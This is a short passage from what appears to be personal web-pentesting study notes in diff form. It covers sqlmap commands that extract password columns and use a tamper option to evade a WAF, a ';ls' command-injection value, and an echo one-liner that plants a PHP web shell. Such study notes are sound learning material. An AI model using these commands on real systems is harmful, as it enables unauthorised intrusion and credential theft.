Anthares101/my-cybersecurity-notes/README_EN.md

 Anthares101@kali:~$ sqlmap -D DB -T TABLE -C id,password,...,... --sql-query "select id,password,...,... from TABLE where COLUMN like PATTERN" -r post_request.txt
 # Extracts the result of a specific query to a known table

+# The parameter --tamper=space2comment allows you to try to bypass certain firewalls (WAF)
 ```
 - **RCE (Remote Command Execution):** If you are putting the code directly: `shell_exec('ping 8.8.8.8');` being the ip what the user enters, if instead we put `;ls`, although `ping` prints an error the command `ls` is executed.
 Once the vulnerability is detected we could run a WebShell: `;echo'<?php echo shell_exec(s_GET["cmd"]); ?>' > shell1.php`.
 If we go to `shell1.php`, with the parameter of the url `cmd` we can execute the commands that we want.
 - **OWASP methodology for testing web security:** OWASP broken web application (To practice attacking pages and stuff)